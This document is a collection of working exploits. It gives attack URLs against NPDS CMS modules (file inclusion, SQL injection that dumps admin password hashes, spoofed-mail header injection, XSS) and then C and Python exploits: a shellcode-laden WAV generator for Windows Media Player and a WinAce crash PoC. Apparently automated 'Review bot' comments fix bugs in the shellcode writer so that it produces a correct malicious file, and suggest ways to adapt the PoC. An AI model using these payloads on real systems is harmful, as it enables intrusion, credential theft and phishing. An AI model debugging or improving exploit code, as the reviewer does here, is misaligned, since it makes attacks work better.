http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../logs/security.log%00
/npds/modules/last-fm/admin/adm_save.php
Include
http:/www.example.com/npds/modules/last-fm/error.php?ModPath=../../../../logs/security.log%00 ET
http:/www.example.com/npds/modules/last-fm/error.php?language=../../../../../logs/security.log%00
/npds/modules/last-fm/error.php
Include
http:/www.example.com/npds/modules/last-fm/last-fm.php?language=../../../../../../logs/security.log%00
/npds/modules/last-fm/last-fm.php
Include
http:/www.example.com/npds/modules/links/admin/create_tables.php?ModPath=../../../../logs/security.log%00/admin%00
/npds/modules/links/admin/create_tables.php
Include
http:/www.example.com/npds/modules/saisie.php?user=1&ModPath=../../logs/security.log%00
/npds/modules/saisie.php
Include
http:/www.example.com/npds/modules/td-galerie/admin/adm.php?ModPath=../../../.././logs/security.log%00
/npds/modules/td-galerie/admin/adm.php
Include
http:/www.example.com/npds/modules/td-glossaire/glossadmin.php?ModPath=../../../logs/security.log%00 OU
http:/www.example.com/npds/modules/td-glossaire/glossadmin.php?language=../../../../../logs/security.log%00
/npds/modules/td-glossaire/glossadmin.php
Include
http:/www.example.com/npds/modules/td-glossaire/glossaire.php?ModPath=../../../logs/security.log%00 OU
http:/www.example.com/npds/modules/td-glossaire/glossaire.php?language=../../../../../logs/security.log%00
/npds/modules/td-glossaire/glossaire.php
Include
http:/www.example.com/npds/modules/td-livredor/admin/livradmin.php?language=../../../../../../../logs/security.log%00
/npds/modules/td-livredor/admin/livradmin.php
Include
http:/www.example.com/npds/modules/td-livredor/envoi.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/envoi.php?language=..
/../../../logs/security.log%00
/npds/modules/td-livredor/envoi.php
Include
http:/www.example.com/npds/modules/td-livredor/error.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/error.php?language=..
/../../../logs/security.log%00
/npds/modules/td-livredor/error.php
Include
http:/www.example.com/npds/modules/td-livredor/error.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/error.php?language=..
/../../../logs/security.log%00
/npds/modules/td-livredor/error.php
Include
http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../../logs/security.log%00
/npds/modules/td-livredor/livre.php
Include
http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../../logs/security.log%00
/npds/modules/td-livredor/livre.php
Include
http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../logs/security.log%00
/npds/modules/td-livredor/livre.php
Include
http:/www.example.com/npds/modules/TvGuide/index.php?ModPath=../../../logs/security.log%00
http:/www.example.com/npds/modules/TvGuide/index.php?language=../../../logs/security.log%00
/npds/modules/TvGuide/index.php
Include
http:/www.example.com/npds/modules/G-annonces/modif_ann.php?ModPath=../../../index.php%00&op=modifier&HTTP_POST_VARS[code]=60000&id=1&table_annonces=annonces&
HTTP_POST_VARS[tel]=Owned%20!!
/npds/modules/G-annonces/modif_ann.php
Modify all comment without login/password
http:/www.example.com/npds/friend.php?op=SendSite&yname=bill%20gates%20<ex_pdg@microsoft.com>%0ATo:victime@poor.fr%0ASubject%20:%20XP%20SP%203%0A%0ADownload%2
0last%20SP%203%20for%20Win%20XP%20in%20www.fakewebsite.com%0A&ymail=ex_pdg@microsoft.com&fname=jfl%0A&fmail=victim2@poor.net
/npds/friend.php
Send fake mail, spam
http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&ble_annonces=`users`/*
/npds/modules/G-annonces/index.php
SQL Inject
http:/www.example.com/npds/modules/G-annonces/list_ann.php?ModPath=../../../index.php%00&table_annonces=annonces%20UNION%20SELECT%200,0,0,CONCAT(aid,char(58),
name,char(58),url,char(58),email,char(58),pwd,char(58)),0,0,0,0,0%20FROM%20authors/*
/npds/modules/G-annonces/list_ann.php
SQL Inject
http:/www.example.com/npds/modules/G-annonces/search.php?ModPath=../../../index.php%00&HTTP_POST_VARS[action]=ajouter&table_annonces=annonces%20UNION%20SELECT
%200,0,CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char
(58)),0,0,0,0,0%20FROM%20authors/*
/npds/modules/G-annonces/search.php
SQL Inject
http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&table_cat=annonces_cat%20UNION%20SELECT%20CONCAT(aid,char(58),name,char(
58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58))%20FROM%20authors/*&table_annonc
es=`annonces`http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&table_cat=faqcategories%20UNION%20SELECT%20CONCAT(aid,char(5
8),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58))%20FROM%20authors/*
&table_annonces=`annonces` WHERE `date`<1/*
/npds/modules/G-annonces/index.php
SQL Inject
ECT%200,0,CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,c
har(58)),0,0,0,0,0%20FROM%20authors/*
/npds/modules/G-annonces/modif_ann.php
SQL Inject
http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?ModPath=../../../../mainfile.php%00&id_user=1&table_annonces=annonces%20UNION%20SELECT%20CONCA
T(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name
,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(
58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),
pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd)%20FROM%20autho
rs/*
/npds/modules/G-annonces/admin/adm_ann.php
SQL Inject & Include
http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?ModPath=../../../../../../npds/index.php%00&HTTP_POST_VARS[action]=ajouter&HTTP_POST_VARS[tabl
e_cat]=%20`users_status`%20(%20`posts`%20,%20`attachsig`%20,%20`rank`%20,%20`level`%20,%20`open`)%20VALUES%20(1,%200,%200,%202,%201)/* OU RECUP DE MOT DE
PASSE ROOT
http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?ModPath=../../../../mainfile.php%00&HTTP_POST_VARS[action]=ajouter&HTTP_POST_VARS[table_cat]=fa
qcategories%20UNION%20SELECT%20CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58)
,email,char(58),pwd,char(58))%20FROM%20authors/*
/npds/modules/G-annonces/admin/adm_cat.php
SQL Inject & Include
http:/www.example.com/npds/modules/G-annonces/admin/?ModPath=../../../../../../npds/index.php%00&table_cat=`test_hack_npds`%20(%20id_cat%20mediumint(11)%20NOT
%20NULL%20auto_increment,%20categorie%20int(3)%20NOT%20NULL%20default%201,%20KEY%20id%20(id_cat))/*
/npds/modules/G-annonces/admin/index.php
SQL Inject & Include
http:/www.example.com/npds/modules/G-annonces/annonce_form.php?ModPath=../../../logs/security.log%00
/npds/modules/G-annonces/annonce_form.php
SQL Inject & Include
XSS non permanent
/npds/modules/annonces/affi_ann.php
XSS
XSS non permanent
/npds/modules/annonces/affiche.php
XSS
http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?mess_acc=%3Cscript>alert("test");%3C/script>
/npds/modules/G-annonces/admin/adm_ann.php
XSS
http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?mess_acc=%3Cscript>alert("test");%3C/script>
/npds/modules/G-annonces/admin/adm_cat.php
XSS
http:/www.example.com/npds/modules/G-annonces/annonce_form.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/npds/modules/G-annonces/annonce_form.php
XSS
http:/www.example.com/npds/modules/G-annonces/index.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/npds/modules/G-annonces/index.php
XSS
http:/www.example.com/npds/modules/G-annonces/list_ann.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/npds/modules/G-annonces/list_ann.php
XSS
http:/www.example.com/npds/modules/G-annonces/modif_ann.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/npds/modules/G-annonces/modif_ann.php
XSS
http:/www.example.com/npds/modules/G-annonces/search.php?mess_acc=%3Cscript>alert(&#039;test&#039;);</script>
/npds/modules/G-annonces/search.php
XSS
http:/www.example.com/npds/modules/G-annonces/admin/index.php?mess_acc=%3Cscript>alert("test");%3C/script>
/npds/modules/GS-annonces/admin/index.php
XSS
http:/www.example.com/npds/modules/Top10/top10.php?bgcolor2=green"><script>alert(&#039;test&#039;);</script>
/npds/modules/Top10/top10.php
XSS
http:/www.example.com/npds/themes/npds2004/footer.php?theme="><script>alert(&#039;test&#039;);</script>
/npds/themes/npds2004/footer.php
XSS


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33111/info
SolucionXpressPro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/main.php?id_area=[SQL]


@ -0,0 +1,51 @@
source: http://www.securityfocus.com/bid/33042/info
Microsoft Windows Media Player is prone to a code-execution vulnerability.
An attacker can exploit this issue by tricking an unsuspecting victim into opening a malicious file with the vulnerable application. A successful exploit will allow arbitrary code to run in the context of the user running the application.
#include <stdio.h>
int main()
{
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=138 Encoder=None http://metasploit.com */
unsigned char scode[] =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99"
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04"
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30"
"\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09"
"\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8"
"\x83\xc0\x7b\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff"
"\xe7\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
unsigned char begincode[] =
"\x52\x49\x46\x46\x04\x44\x0E\x01\x57\x41\x56\x45\x66\x6D\x74\x20"
"\x28\x00\x00\x00\xFE\xFF\x02\x00\x00\xEE\x02\x00\x00\x94\x11\x00"
"\x06\x00\x18\x00\x16\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x10\x00\x80\x00\x00\xAA\x00\x38\x9B\x71\x64\x61\x74\x61"
"\xC8\x43\x0E\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00";
FILE *f;
f = _fsopen("new.wav", "w+", 0);
fwrite(begincode, sizeof(scode), 1, f);
for (int i=0; i<20000; i++)
fwrite(scode, sizeof(scode), 1, f);
fclose(f);
return 0;
}
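Review bot: The header write at `fwrite(begincode, sizeof(scode), 1, f);` is sized by the wrong array: sizeof(scode) is 139 (138 shellcode bytes plus the string terminator), so only the first 139 bytes of the 295-byte RIFF/WAVE header in begincode ever reach new.wav and the remainder of the header is silently dropped; whether the truncated header still reaches the vulnerable parser is not something I can tell from here. Both fwrite calls also count each array's trailing NUL, so a stray 0x00 is emitted after every copy of scode; `sizeof(x) - 1` is the intended length. `_fsopen("new.wav", "w+", 0)` opens in text mode on Windows, which would rewrite any 0x0A byte in the output, and its return value is never checked before use, so a failed open dereferences NULL; opening with "w+b" and guarding the handle fixes both. main is contained entirely in this hunk.
```c
f = _fsopen("new.wav", "w+b", 0);
if (f == NULL)
    return 1;
fwrite(begincode, sizeof(begincode) - 1, 1, f);
for (int i = 0; i < 20000; i++)
    fwrite(scode, sizeof(scode) - 1, 1, f);
/* ... unchanged: fclose and return ... */
```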


@ -0,0 +1,66 @@
source: http://www.securityfocus.com/bid/33049/info
Winace is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to crash Windows Explorer, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Winace 2.2 is vulnerable; other versions may also be affected.
#!/usr/bin/python
#####################################
# Author :
cN4phux
#
# Mail : cN4phux[at]Gmail[dot]com # Proud to be Algerian; #
# Site : N/A (not
yet) #
#####################################
#Greetz to all DZ's : Blub , Knuthy , His0k4 , Djug , Izem , etc . . .
# : Zigma , Heurs etc . . .
# MS Windows Explorer Unspecified ( WinAce 2.2 ) Denial of Service Exploit
# Magic offset :
# Bug comes from shell32.dll
# EventType : BEX P1 : explorer.exe P2 : 6.0.2900.2180 P3
: 41107ece
# P4 : shell32.dll P5 : 6.0.2900.2180 P6 : 4125330f P7 :
000e1666
# P8 : c0000409 P9 : 00000000
# Just right click the file and move your mouse to( Add to
"AAAAAAAAAAAAAAAAAAAAAAAA. . . .ace" ) with WinAce and you'll see ur
Explorer crashes .
# Successfully tested on Windows XP SP2 FR,
import sys
txt_header = ((("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41"))); #
txt_title = "\x41"*194 #
ext = ".txt";
headers = open(txt_title + ext, "w")
headers.write(txt_header)
headers.close()
print "\nFile created successfully !";
print "\n\cN4phux.";
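Review bot: The closing `print "\n\cN4phux.";` contains `\c`, which is not a recognised escape sequence; Python 2 keeps the backslash literally, but Python 3.12+ reports it as a SyntaxWarning, and since the bare `print` statements make the whole script Python 2-only anyway, a `#!/usr/bin/python2` shebang or a one-line note would save readers a SyntaxError on a modern interpreter. The file handle is opened, written and closed by hand with no error path, so a filesystem that rejects the 198-character name (194 'A's plus ".txt") ends in a traceback rather than a message; `with open(txt_title + ext, "w") as headers: headers.write(txt_header)` inside a `try`/`except IOError` does the same work and reports the failure. The header comment attributes the crash to WinAce's "Add to ...ace" context-menu entry for the long filename, which suggests the filename length is the trigger and the 253-byte `txt_header` is incidental padding — if that matches the author's intent, a comment such as `# the 198-char filename is the trigger; the file body is only padding` above `txt_title` would make the proof-of-concept far easier to adapt.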